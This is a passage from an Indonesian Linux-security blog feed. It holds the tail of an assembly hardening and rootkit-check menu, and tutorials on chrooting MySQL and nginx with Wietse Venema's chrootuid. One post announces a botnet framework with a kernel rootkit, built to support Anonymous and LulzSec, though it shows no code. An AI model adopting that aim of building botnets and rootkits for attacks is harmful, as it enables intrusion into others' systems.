edx,pjg_m3nu1<br /><br /> call (_herosvh_writeln)<br /><br /> <br /><br /> mov ecx,m3nu2<br /><br /> mov edx,pjg_m3nu2<br /><br /> call (_herosvh_writeln)<br /><br /> <br /><br /> mov ecx,m3nu3<br /><br /> mov edx,pjg_m3nu3<br /><br /> call (_herosvh_writeln)<br /><br /> <br /><br /> <br /><br /> <br /><br /> mov ecx,m3nu5<br /><br /> mov edx,pjg_m3nu5<br /><br /> call (_herosvh_writeln)<br /><br /> <br /><br /> mov ecx,m3nu6<br /><br /> mov edx,pjg_m3nu6<br /><br /> call (_herosvh_writeln)<br /><br /> <br /><br /> <br /><br /> <br /><br /> mov ecx,c0ns0l3<br /><br /> mov edx,pjg_c0ns0l3<br /><br /> call (_herosvh_writeln)<br /><br /> <br /><br /> mov eax,3 <br /><br /> mov ebx,0 <br /><br /> mov ecx,pilih_on_heap <br /><br /> int 80h<br /><br /><br /><br /> push eax<br /><br /> <br /><br /> <br /><br /> xor eax,eax<br /><br /> mov eax, dword [pilih_on_heap] <br /><br /> <br /><br /> cmp eax,'sys1'<br /><br /> je _herosvh_sysctl_w_net.ipv4.conf.all.rp_filter_1<br /><br /> <br /><br /> cmp eax,'sys2'<br /><br /> je _herosvh_net.ipv4.tcp_syncookies_1 <br /><br /> <br /><br /> cmp eax,'sys3'<br /><br /> je _herosvh_net.ipv4.icmp_echo_ignore_broadcasts_1<br /><br /><br /><br /> <br /><br /> cmp eax,'rkc1'<br /><br /> je _herosvh_jynx<br /><br /><br /><br /> cmp eax,'rkc2'<br /><br /> je _herosvh_ipsecs<br /><br /> <br /><br /> jmp _herosvh_out<br /><br /> mov esp,ebp<br /><br /> pop ebp<br /><br /><br /><br />_herosvh_out:<br /><br />nop <br /><br />mov eax,0x01<br /><br />int 80h<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-338628950173999722?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-91935019770629638372012-03-05T20:01:00.000-08:002012-03-05T20:01:56.301-08:00chrooting nginx<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-LktosY0LG3E/T1WMHRS71FI/AAAAAAAAA70/tZwzSBCrnME/s1600/botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-LktosY0LG3E/T1WMHRS71FI/AAAAAAAAA70/tZwzSBCrnME/s1600/botnet.jpg" width="720" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-9193501977062963837?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-85341208938330017392012-03-05T19:44:00.002-08:002012-03-05T19:47:39.462-08:00chrooting bind<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-hkWKgO8hAvk/T1WIw1A-zpI/AAAAAAAAA7s/gxJl5UO1qRI/s1600/botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-hkWKgO8hAvk/T1WIw1A-zpI/AAAAAAAAA7s/gxJl5UO1qRI/s1600/botnet.jpg" width="720" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-8534120893833001739?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-27978560619954568302012-03-05T13:06:00.005-08:002012-03-05T13:55:28.555-08:00botnet development continuethis isnt as simple as they think, off course we've kernel space code also (i intent to use inline assembly), 70% written in perl for portability between nix, 10 % written using c , 10% written using python , 10 - 15 % written in assembly and php, this isnt as simple as they think.planned to work on most nix including bsd (available also lkm rootkit included for linux and bsd) , development mission: support project mayhem, anti-sec, lulzsec and anonymous by providing a very good framework<br /><br /><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-jQwDCcU7FMY/T1UqBIa2v3I/AAAAAAAAA7c/gZkd8M8rXYM/s1600/botnet2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-jQwDCcU7FMY/T1UqBIa2v3I/AAAAAAAAA7c/gZkd8M8rXYM/s1600/botnet2.jpg" width="720" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-ATYsORUKWjA/T1UpvFA0OPI/AAAAAAAAA7U/VEpRyZEjGJM/s1600/botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-ATYsORUKWjA/T1UpvFA0OPI/AAAAAAAAA7U/VEpRyZEjGJM/s1600/botnet.jpg" width="720" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-2797856061995456830?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-34146367975969735012012-03-04T10:55:00.000-08:002012-03-04T10:55:34.033-08:00Preparing New Dedicated Serverwell some skiddie messing around with some of my servers, they successfully made me postpone my botnet development, unfortunetly it's just temporary since i can make a stronger system<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-i2onNOvUnSM/T1O6CyrOTfI/AAAAAAAAA7M/mJNW4R7TQ4c/s1600/botnet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-i2onNOvUnSM/T1O6CyrOTfI/AAAAAAAAA7M/mJNW4R7TQ4c/s1600/botnet.jpg" width="720" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-3414636797596973501?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-78504969062434793212012-03-04T09:41:00.000-08:002012-03-04T09:41:07.595-08:00instalasi mysql di dalam chroot jailby: ev1lut10n<br /><br />ekstrak mysql-5.156 lalu configure:<br /><br />=============<br />[root@godad mysql-5.1.56]# ./configure --prefix=/usr/local/mysql --with-mysqld-user=mysql --with-unix-socket-path=/tmp/mysql.sock --with-mysqld-ldflags=-all-static<br />[root@godad mysql-5.1.56]# make && make install<br />==============<br /><br />siapkan my.cnf di /etc<br />==========<br />[root@godad mysql-5.1.56]# locate my-small.cnf <br />/etc/my-small.cnf<br />/root/mysql-5.1.56/support-files/my-small.cnf<br />/root/mysql-5.1.56/support-files/my-small.cnf.sh<br />/usr/local/mysql/share/mysql/my-small.cnf<br />/usr/local/share/mysql/my-small.cnf<br />/usr/share/doc/mysql-server-5.0.77/my-small.cnf<br />/usr/share/mysql/my-small.cnf<br />[root@godad mysql-5.1.56]# cp /root/mysql-5.1.56/support-files/my-small.cnf /etc/my.cnf<br />[root@godad ~]# chown root:root /etc/my.cnf<br />[root@godad ~]# chmod 644 /etc/my.cnf<br />=============<br /><br /><br />edit my.cnf di bawah [mysqld] tambahkan line :<br />===<br />[mysqld]<br />user = mysql<br />====<br /><br />lalu hapus line2 ini:<br />====<br />table_open_cache=4<br />=====<br /><br />====<br />buffer_size=64K<br />====<br /><br /><br />Selanjutnya install database mysql:<br />====<br />[root@godad mysql-5.1.56]# /usr/local/mysql/bin/mysql_install_db --user=mysql<br />Installing MySQL system tables...<br />120304 1:53:10 [Warning] '--skip-locking' is deprecated and will be removed in a future release. Please use '--skip-external-locking' instead.<br />OK<br />Filling help tables...<br />120304 1:53:10 [Warning] '--skip-locking' is deprecated and will be removed in a future release. Please use '--skip-external-locking' instead.<br />OK<br /><br />To start mysqld at boot time you have to copy<br />support-files/mysql.server to the right place for your system<br /><br />PLEASE REMEMBER TO SET A PASSWORD FOR THE MySQL root USER !<br />To do so, start the server, then issue the following commands:<br /><br />/usr/local/bin/mysqladmin -u root password 'new-password'<br />/usr/local/bin/mysqladmin -u root -h localhost password 'new-password'<br /><br />Alternatively you can run:<br />/usr/local/bin/mysql_secure_installation<br /><br />which will also give you the option of removing the test<br />databases and anonymous user created by default. This is<br />strongly recommended for production servers.<br /><br />See the manual for more instructions.<br /><br />You can start the MySQL daemon with:<br />cd /usr/local ; /usr/local/bin/mysqld_safe &<br /><br />You can test the MySQL daemon with mysql-test-run.pl<br />cd /usr/local/mysql-test ; perl mysql-test-run.pl<br /><br />Please report any problems with the /usr/local/bin/mysqlbug script!<br /><br />========<br /><br /><br /><br />untuk menginstall mysql di dalam chroot matikan daemon mysql:<br />=====<br />[root@godad mysql-5.1.56]# /usr/local/mysql/bin/mysqladmin -u root shutdown<br /><br />=====<br /><br />[Chrooting mysql]<br /><br />persiapkan struktur direktori untuk chroot mysql di /chroot/mysql:<br />====<br />[root@godad mysql-5.1.56]# mkdir -p /chroot/mysql/dev /chroot/mysql/etc /chroot/mysql/tmp /chroot/mysql/var/tmp /chroot/mysql/usr/local/mysql/libexec /chroot/mysql/usr/local/mysql/share/mysql/english<br />========<br /><br />lalu kopikan file2 yang diperlukan ke direktori chroot:<br />===========<br />[root@godad mysql-5.1.56]# chown -R root:sys /chroot/mysql<br />[root@godad mysql-5.1.56]# chmod -R 755 /chroot/mysql<br />[root@godad mysql-5.1.56]# chmod 1777 /chroot/mysql/tmp<br />[root@godad mysql-5.1.56]# cp /etc/hosts /chroot/mysql/etc/<br />[root@godad mysql-5.1.56]# cp /etc/host.conf /chroot/mysql/etc/<br />[root@godad mysql-5.1.56]# cp /etc/resolv.conf /chroot/mysql/etc/<br />[root@godad mysql-5.1.56]# cp /etc/group /chroot/mysql/etc/<br />[root@godad mysql-5.1.56]# cd /usr/local;tar czvf mysql.tgz mysql<br />[root@godad mysql-5.1.56]# cp mysql.tgz /chroot/mysql/usr/local<br />[root@godad mysql-5.1.56]# cd /chroot/mysql/usr/local<br />[root@godad local]# tar zxvf mysql.tgz<br />[root@godad local]# mknod /chroot/mysql/dev/null c 2 2<br />[root@godad local]# chown root:sys /chroot/mysql/dev/null<br />[root@godad local]# chmod 666 /chroot/mysql/dev/null<br />====<br /><br />selanjutnya edit shell dan home direktori mysql :<br />=========<br />[root@godad local]# cat /etc/passwd | grep mysql<br />mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash<br />[root@godad local]# nano /etc/passwd<br />[root@godad local]# cat /etc/passwd | grep mysql<br />mysql:x:27:27:MySQL Server:/dev/null:/bin/false<br />[root@godad local]# cp /etc/passwd /chroot/mysql/etc<br />[root@godad local]# cp /etc/passwd /chroot/mysql/etc/passwords<br />[root@godad local]# cp /etc/passwd /chroot/mysql/etc/passwd.bak<br />[root@godad local]# cp /etc/passwd /chroot/mysql/etc/~passwd<br />[root@godad local]# ln /chroot/mysql/tmp/mysql.sock /chroot/nginx/tmp<br />=========<br /><br />siapakan init skrip:<br />===<br />[root@godad init.d]# nano mysqld_chroot<br />[root@godad init.d]# chmod +s mysqld_chroot<br />=====<br /><br />install chrootuid:<br />====<br />[root@godad ~]# wget ftp://ftp.porcupine.org/pub/security/chrootuid1.3.tar.gz<br />--2012-03-04 02:30:16-- ftp://ftp.porcupine.org/pub/security/chrootuid1.3.tar.gz<br /> => `chrootuid1.3.tar.gz'<br />Resolving ftp.porcupine.org... 168.100.185.123<br />Connecting to ftp.porcupine.org|168.100.185.123|:21... connected.<br />Logging in as anonymous ... Logged in!<br />==> SYST ... done. ==> PWD ... done.<br />==> TYPE I ... done. ==> CWD /pub/security ... done.<br />==> SIZE chrootuid1.3.tar.gz ... 5439<br />==> PASV ... done. ==> RETR chrootuid1.3.tar.gz ... done.<br />Length: 5439 (5.3K)<br /><br />100%[==================================================================================================================>] 5,439 --.-K/s in 0.08s <br /><br />2012-03-04 02:30:18 (66.9 KB/s) - `chrootuid1.3.tar.gz' saved [5439]<br />[root@godad ~]# tar zxvf chrootuid1.3.tar.gz<br />chrootuid1.3/<br />chrootuid1.3/README<br />chrootuid1.3/chrootuid.c<br />chrootuid1.3/chrootuid_license<br />chrootuid1.3/chrootuid.1<br />chrootuid1.3/Makefile<br />[root@godad ~]# cd chrootuid1.3<br />[root@godad chrootuid1.3]# ls -a<br />. .. chrootuid.1 chrootuid.c chrootuid_license Makefile README<br />[root@godad chrootuid1.3]# cat chrootuid.1<br />.TH CHROOTUID 1 <br />.ad<br />.fi<br />.SH NAME<br />chrootuid<br />\-<br />run command in restricted environment<br />.SH SYNOPSIS<br />.na<br />.nf<br />\fBchrootuid\fR \fInewroot newuser command\fR...<br />.SH DESCRIPTION<br />.ad<br />.fi<br />The \fBchrootuid\fR command sets up a restricted environment for<br />executing \fIcommand\fR. Access to the file system is restricted to<br />the \fInewroot\fR subtree; privileges are restricted to those of<br />the \fInewuser\fR account (which must be a known account in the<br />unrestricted environment).<br />The initial working directory is changed to \fInewroot\fR.<br /><br />\fBchrootuid\fR combines chroot(8) and su(1) into one program, so<br />that there is no need to have commands such as /usr/bin/su<br />in the restricted environment.<br /><br />Only the superuser can use the \fBchrootuid\fR command.<br />.SH DIAGNOSTICS<br />.ad<br />.fi<br />The exit status is 1 when \fBchrootuid\fR has a problem, otherwise<br />the exit status is the exit status of \fIcommand\fR.<br />.SH SEE ALSO<br />.na<br />.nf<br />chroot(8), su(1)<br />.SH DIAGNOSTICS<br />.ad<br />.fi<br />Problems are reported to the syslog daemon.<br />.SH AUTHOR(S)<br />.na<br />.nf<br />Wietse Venema<br />Eindhoven University of Technology<br />Department of Mathematics and Computer Science<br />Den Dolech 2, P.O. Box 513, 5600 MB Eindhoven, The Netherlands<br /><br />IBM T.J. Watson Research<br />P.O. Box 704<br />Yorktown Heights, NY 10598, USA<br />.SH CREATION DATE<br />.na<br />.nf<br />Tue Oct 13 11:37:29 MET 1992<br />.SH LAST MODIFICATION<br />.na<br />.nf<br />Wed Jul 25 11:25:08 EDT 2001<br />.SH VERSION/RELEASE<br />.na<br />.nf<br />1.3<br />[root@godad chrootuid1.3]# cat chrootuid.c <br />/*++<br />/* NAME<br />/* chrootuid 1<br />/* SUMMARY<br />/* run command in restricted environment<br />/* SYNOPSIS<br />/* \fBchrootuid\fR \fInewroot newuser command\fR...<br />/* DESCRIPTION<br />/* The \fBchrootuid\fR command sets up a restricted environment for<br />/* executing \fIcommand\fR. Access to the file system is restricted to<br />/* the \fInewroot\fR subtree; privileges are restricted to those of<br />/* the \fInewuser\fR account (which must be a known account in the<br />/* unrestricted environment).<br />/* The initial working directory is changed to \fInewroot\fR.<br />/*<br />/* \fBchrootuid\fR combines chroot(8) and su(1) into one program, so<br />/* that there is no need to have commands such as /usr/bin/su<br />/* in the restricted environment.<br />/*<br />/* Only the superuser can use the \fBchrootuid\fR command.<br />/* DIAGNOSTICS<br />/* The exit status is 1 when \fBchrootuid\fR has a problem, otherwise <br />/* the exit status is the exit status of \fIcommand\fR.<br />/* SEE ALSO<br />/* chroot(8), su(1)<br />/* DIAGNOSTICS<br />/* Problems are reported to the syslog daemon.<br />/* AUTHOR(S)<br />/* Wietse Venema<br />/* Eindhoven University of Technology<br />/* Department of Mathematics and Computer Science<br />/* Den Dolech 2, P.O. Box 513, 5600 MB Eindhoven, The Netherlands<br />/*<br />/* IBM T.J. Watson Research<br />/* P.O. Box 704<br />/* Yorktown Heights, NY 10598, USA<br />/* CREATION DATE<br />/* Tue Oct 13 11:37:29 MET 1992<br />/* LAST MODIFICATION<br />/* Wed Jul 25 11:25:08 EDT 2001<br />/* VERSION/RELEASE<br />/* 1.3<br />/*--*/<br /><br />#ifndef lint<br />static char sccsid[] = "@(#) chrootuid.c 1.3 2001/07/25 11:25:08";<br />#endif<br /><br />/* System libraries. */<br /><br />#include <unistd.h><br />#include <stdlib.h><br />#include <pwd.h><br />#include <grp.h><br />#include <syslog.h><br /><br />int main(argc, argv)<br />int argc;<br />char **argv;<br />{<br /> struct passwd *pwd;<br /><br /> /*<br /> * Open a channel to the syslog daemon. Older versions of openlog()<br /> * require only two arguments.<br /> */<br /><br />#ifdef LOG_DAEMON<br /> (void) openlog(argv[0], LOG_PID | LOG_NDELAY, LOG_DAEMON);<br />#else<br /> (void) openlog(argv[0], LOG_PID);<br />#endif<br /><br /> /*<br /> * Require proper amount of arguments. In all cases of error, exit with<br /> * zero status because we have already reported the problem via syslogd.<br /> * No need to make inetd complain, too.<br /> */<br /><br /> if (argc < 4) {<br /> syslog(LOG_ERR, "usage: %s path user command", argv[0]);<br /> return (0);<br /> }<br /> /* Must step into the new subtree. */<br /><br /> if (chdir(argv[1])) {<br /> syslog(LOG_ERR, "chdir(%s): %m", argv[1]);<br /> return (0);<br /> }<br /> /* The user must be known in the *unrestricted* universe... */<br /><br /> if ((pwd = getpwnam(argv[2])) == 0) {<br /> syslog(LOG_ERR, "%s: user unknown", argv[2]);<br /> return (0);<br /> }<br /> /* initgroups() accesses the group file in the unrestricted universe... */<br /><br /> if (initgroups(pwd->pw_name, pwd->pw_gid) < 0) {<br /> syslog(LOG_ERR, "initgroups: %m");<br /> return (0);<br /> }<br /> endgrent();<br /><br /> /* Do the chroot() before giving away root privileges. */<br /><br /> if (chroot(argv[1])) {<br /> syslog(LOG_ERR, "chroot(%s): %m", argv[1]);<br /> return (0);<br /> }<br /> /* Switch group id then user id. */<br /><br /> if (setgid(pwd->pw_gid)) {<br /> syslog(LOG_ERR, "setgid(%d): %m", pwd->pw_gid);<br /> return (0);<br /> }<br /> if (setuid(pwd->pw_uid)) {<br /> syslog(LOG_ERR, "setuid(%d): %m", pwd->pw_uid);<br /> return (0);<br /> }<br /> /* In case we still have the /etc/passwd file still open. */<br /><br /> endpwent();<br /><br /> /* Run the command and hope for the best. */<br /><br /> (void) execv(argv[3], argv + 3);<br /> syslog(LOG_ERR, "%s: %m", argv[3]);<br /> return (0);<br />}<br />[root@godad chrootuid1.3]# cat chrootuid_license<br />-----BEGIN PGP SIGNED MESSAGE-----<br /><br />As of July 25, 2001, the text below constitutes the chrootuid license.<br /><br /> /*<br /> * Copyright 2001 by Wietse Venema. All rights reserved. Some individual<br /> * files may be covered by other copyrights.<br /> * <br /> * This material was originally written and compiled by Wietse Venema at<br /> * Eindhoven University of Technology, The Netherlands, in 1990, 1991, 1992,<br /> * 1993, 1994 and 1995.<br /> * <br /> * Later versions are maintained by Wietse Venema at IBM T.J. Watson Research,<br /> * Hawthorne, USA, in 2001.<br /> * <br /> * Redistribution and use in source and binary forms, with or without<br /> * modification, are permitted provided that this entire copyright notice is<br /> * duplicated in all such copies.<br /> * <br /> * This software is provided "as is" and without any expressed or implied<br /> * warranties, including, without limitation, the implied warranties of<br /> * merchantibility and fitness for any particular purpose.<br /> */<br /><br />-----BEGIN PGP SIGNATURE-----<br />Version: 2.6.3i<br />Charset: noconv<br /><br />iQCVAwUBO17bvtyA8qbVMny5AQF8zgP+LYWTT4axQNy3aAdr7SAFNcoNAjNNa02f<br />Oij2zE2SAjIW/g+dEbIdPewPccXzvSoKgbW9EcIIS8Ix958FIYeAPVkFNywvvn8u<br />ETrpU8KP3SBMdvyk57gLqYDOr+LQvqD6TkkfND5p0++LUPGR/31qjBpRZDSQngWZ<br />uCuydXF4tec=<br />=EpPk<br />-----END PGP SIGNATURE-----<br />[root@godad chrootuid1.3]# ls<br />chrootuid.1 chrootuid.c chrootuid_license Makefile README<br />[root@godad chrootuid1.3]# cat Makefile<br /># @(#) Makefile 1.2 93/08/12 16:09:29<br /><br />FILES = README Makefile chrootuid.c chrootuid.1<br />CFLAGS = -O <br /><br />all: chrootuid chrootuid.1<br /><br />chrootuid: chrootuid.c<br /> $(CC) $(CFLAGS) -o $@ $?<br /><br />#chrootuid.1: chrootuid.c<br /># srctoman $? >$@<br /><br />shar: $(FILES)<br /> @shar $(FILES)<br /><br />install: chrootuid.1 chrootuid<br /> cp chrootuid /usr/local/bin<br /> cp chrootuid.1 /usr/local/man/man1<br /><br />clean:<br /> rm -f *.o core chrootuid<br />[root@godad chrootuid1.3]# ls<br />chrootuid.1 chrootuid.c chrootuid_license Makefile README<br />[root@godad chrootuid1.3]# cat README<br />@(#) README 1.3 2001/07/25 10:15:32<br /><br />chrootuid - run command in restricted environment<br /><br />Description<br />===========<br /><br />Chrootuid makes it easy to run a network service at low privilege<br />level and with restricted file system access. In the past I used<br />this program to run the gopher and www (world-wide web) network<br />daemons in a restricted environment: the daemons have access only<br />to their own directory tree, and run under a low-privileged userid.<br />Nowadays I also use it for proxy servers. The arrangement greatly<br />reduces the impact of possible loopholes in network software.<br /><br />Note: for security reasons, chrootuid uses the passwd and group<br />files from *outside* the chroot area. This idea was suggested by<br />Douglas Schales of Texas A&M University, now with IBM Research.<br /><br />This software was initially released in 1993. However, chrootuid<br />is still being used after all those years, so I have released a<br />slightly updated version with a BSD-style license. The examples<br />below are still the original ones. Although the systems don't exist<br />anymore, the same ideas still apply.<br /><br /> Wietse Venema<br /> wietse@porcupine.org<br /> IBM T.J. Watson Research Center<br /> Hawthorne, USA<br /><br />Installation<br />============<br /><br />The source of the chrootuid program is small and easy to verify. In<br />order to build the program, run "make". If it compiles OK, edit the<br />destination pathnames in the Makefile and do a "make install".<br /><br />Important: chrootuid should *not* be installed set-uid.<br /><br />Using the chrootuid program<br />===========================<br /><br />The use of the chrootuid program will be illustrated with the gopher<br />service. The examples are easily adapted to www (world-wide web) or any<br />other network service.<br /><br />In the inetd.conf file, make a gopher entry like this:<br /><br /> gopher stream tcp nowait root /usr/local/lib/gopherd gopherd<br /><br />If you like to run the daemon under control of my tcp/ip daemon<br />wrapper, use the following entry:<br /><br /> gopher stream tcp nowait root /some/where/tcpd /usr/local/lib/gopherd<br /><br />On some systems you will have to omit the "root" field, because all<br />daemons are executed as root by default. <br /><br />The file /usr/local/lib/gopherd should be a shell script that is<br />maintained by the superuser, because inetd runs the script with root<br />privilege. It is this script that runs the real gopher daemon, as an<br />unprivileged process, in a restricted environment. Of course you can<br />specify any other pathname for the script, as long as it is fully<br />controlled by the superuser.<br /><br /> #!/bin/sh<br /><br /> exec /usr/local/bin/chrootuid /some/where/gopher nobody \<br /> /bin/gopherd -I -l /tmp/gopher.log \<br /> -o /bin/gopherd.conf \<br /> -c -C /gopherdata 70<br /><br />I'll describe the contents of this script in some detail:<br /><br />- Instead of /usr/local/bin/chrootuid, specify the absolute path to the<br />installed chrootuid executable. The program is executed by root so the<br />path should be fully controlled by the super user.<br /><br />- Instead of /some/where/gopher, specify the absolute path to your<br />gopher directory tree. The gopher daemon will have access only to files<br />within this subtree. This arrangement is similar to anonymous FTP.<br /><br />- The gopher daemon will be executed with the privileges of the "nobody"<br />account. You can specify any unprivileged account, as long as it does<br />not own any files etc. within the gopher directory tree. The account<br />info will be extracted from the regular password database, so there is<br />no need for passwd or group files below the gopher directory tree.<br /><br />- "/bin/gopherd -I -l ..." is the command that will be executed, after<br />access to the file system has been restricted to the gopher directory<br />tree, and after privileges have been reduced to those of "nobody" (or<br />whatever account name you choose). All path names should be absolute<br />with respect to the root of the gopher directory tree. Thus,<br />/bin/gopherd corresponds to /some/where/gopher/bin/gopherd.<br /><br />On systems with shared libraries it will be necessary to set up the<br />appropriate files in the gopher directory tree. The appendix below<br />shows [a slightly edited version of] what we have. It is very similar<br />to what one has to set up for anonymous FTP, except that no passwd or<br />group files are needed.<br /><br />Finally, chrootuid reports all problems to the syslog daemon. Have a<br />look at your syslog.conf file if you don't know where the errors are<br />logged.<br /><br />Appendix: sample restricted gopher subtree<br />==========================================<br /><br />This example is a slightly edited version of own gopher subtree. Some<br />details (shared libs, DNS, and timezone stuff) are specific to SunOS;<br />hints are given for Ultrix 4.x.<br /><br />The restricted gopher subtree is very similar to the tree used for<br />anonymous ftp, except that no passwd or group files are needed. The<br />example assumes that the tree is located at /some/where/gopher, which<br />will sometimes be referred to as ~gopher for brevity.<br /><br />SunOS notes: the shared libraries in this example are specific to<br />SunOS 4.1.1. What you will need depends on the OS release and on the<br />compiler used to build the gopher executable (do `ldd gopherd' to find<br />out; you'll always need the ld.so runtime linker, though). The example<br />assumes that you are running DNS on top of NIS. Otherwise, you will<br />need a ~gopher/etc/resolv.conf file.<br /><br />Ultrix notes: you will need the following files in ~gopher/etc: hosts,<br />resolv.conf, svc.conf, svcorder. Just copy them from a DNS client host.<br /><br />Other systems: it may be necessary to install a ~gopher/etc/resolv.conf<br />file so that gopherd can find the domain name server (DNS).<br /><br />It is convenient to have a symlink ~gopher/some/where/gopher -> ../..<br />so that old pathnames keep working after the installation of chrootuid.<br /><br />Important: make sure that no files etc. are owned by the unprivileged<br />account ("nobody" or whatever you chose). The only exception that we<br />permit is the gopherd logfile, because no program depends on it.<br /><br />~gopher:<br />drwxr-sr-x 2 exp 512 Aug 12 13:33 bin<br />dr-xr-sr-x 2 exp 512 Oct 12 1992 dev<br />drwxr-sr-x 9 exp 512 Aug 9 12:35 gopherdata<br />dr-xr-sr-x 2 exp 512 Apr 22 14:24 some<br />drwxrwsrwt 2 exp 512 Aug 12 13:48 tmp<br />dr-xr-sr-x 4 exp 512 Jan 25 1993 usr<br /><br />~gopher/bin:<br />-rwx--x--x 1 exp 409600 Aug 12 13:39 gopherd<br />-rw-r--r-- 1 exp 2299 Jun 15 10:12 gopherd.conf<br /><br />~gopher/dev:<br />crw-rw-rw- 1 exp 3, 12 Oct 12 1992 zero<br /><br />~gopher/gopherdata:<br /><our information data base omitted for brevity><br /><br />~gopher/some:<br />dr-xr-xr-x 2 exp 512 Apr 22 14:24 where<br /><br />~gopher/some/where:<br />lrwxrwxrwx 1 exp 6 Apr 22 14:24 gopher -> ../../<br /><br />~gopher/tmp:<br />-rw-r--r-- 1 nobody 220563 Aug 12 14:46 gopher.log<br /><br />~gopher/usr:<br />dr-xr-xr-x 2 exp 512 Oct 12 1992 lib<br />dr-xr-xr-x 3 exp 512 Jan 21 1993 share<br /><br />~gopher/usr/lib:<br />-r-xr-xr-x 1 exp 40960 Oct 11 1990 ld.so<br />-r-xr-xr-x 1 exp 516096 Oct 12 1990 libc.so.1.6<br /><br />~gopher/usr/share:<br />dr-xr-xr-x 3 exp 512 Jan 21 1993 lib<br /><br />~gopher/usr/share/lib:<br />dr-xr-xr-x 2 exp 512 Jan 21 1993 zoneinfo<br /><br />~gopher/usr/share/lib/zoneinfo:<br />-r--r--r-- 1 exp 590 Oct 11 1990 MET<br />-r--r--r-- 1 exp 590 Oct 11 1990 localtime<br />[root@godad chrootuid1.3]# <br />====<br /><br />bersih kan ??? no backdoor ok ???<br /><br />install !!!<br /><br />====<br />[root@godad chrootuid1.3]# make<br />cc -O -o chrootuid chrootuid.c<br />[root@godad chrootuid1.3]# cp chrootuid /usr/local/sbin/chrootuid<br />=====<br /><br /><br /><br /><br /><br />====================<br />[root@godad chrootuid1.3]# cat /etc/init.d/mysqld_chroot<br />#!/bin/sh<br />CHROOT_MYSQL=/chroot/mysql<br />CHROOT_PHP=/chroot/nginx<br />SOCKET=/tmp/mysql.sock<br />MYSQLD=/usr/local/mysql/libexec/mysqld<br />PIDFILE=/usr/local/mysql/var/`hostname`.pid<br />CHROOTUID=/usr/local/sbin/chrootuid<br /><br />echo -n " mysql"<br /><br />case "$1" in<br />start)<br /> rm -rf ${CHROOT_PHP}/${SOCKET}<br /> nohup ${CHROOTUID} ${CHROOT_MYSQL} mysql ${MYSQLD} >/dev/null 2>&1 &<br /> sleep 5 && ln ${CHROOT_MYSQL}/${SOCKET} ${CHROOT_PHP}/${SOCKET}<br /> ;;<br />stop)<br /> kill `cat ${CHROOT_MYSQL}/${PIDFILE}`<br /> rm -rf ${CHROOT_MYSQL}/${SOCKET}<br /> ;;<br />*)<br /> echo ""<br /> echo "Usage: `basename $0` {start|stop}" >&2<br /> exit 64<br /> ;;<br />esac<br /><br />exit 0<br />==========================<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-7850496906243479321?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-57746562633660890392012-03-02T13:50:00.003-08:002012-03-02T16:03:34.478-08:00[install nginx-1.0.11 di dalam chroot jail][install nginx-1.0.11 di dalam chroot jail]<br /><br />by: ev1lut10n<br /><br />download nginx-1.0.11 <br /><br />install :<br /><br />===================<br />[root@godaddy_dedicated ~]# cd nginx-1.0.11<br />[root@godaddy_dedicated nginx-1.0.11]# cd nginx-1.0.11<br />[root@godaddy_dedicated nginx-1.0.11]# ./configure --with-http_ssl_module --without-mail_pop3_module --without-mail_imap_module --without-mail_smtp_module --with-http_stub_status_module<br />[root@godaddy_dedicated nginx-1.0.11]# make && make install<br />=================<br /><br /><br />siapkan susunan direktori untuk chroot<br />====<br />[root@godaddy_dedicated ~ conf]# D=/chroot/nginx<br />[root@godaddy_dedicated ~ conf]# mkdir -p $D<br />[root@godaddy_dedicated ~ conf]# mkdir -p $D/etc<br />[root@godaddy_dedicated ~ conf]# mkdir -p $D/dev<br />[root@godaddy_dedicated ~ conf]# mkdir -p $D/var<br />[root@godaddy_dedicated ~ conf]# mkdir -p $D/usr<br />[root@godaddy_dedicated ~ conf]# mkdir -p $D/usr/local/nginx<br />[root@godaddy_dedicated ~ conf]# mkdir -p $D/tmp<br />[root@godaddy_dedicated ~ conf]# chmod 1777 $D/tmp<br />[root@godaddy_dedicated ~ conf]# mkdir -p $D/var/tmp<br />[root@godaddy_dedicated ~ conf]# chmod 1777 $D/var/tmp<br />[root@godaddy_dedicated ~ conf]# mkdir -p $D/lib64<br />===<br /><br /><br />buat blok untuk special char & file<br />====<br 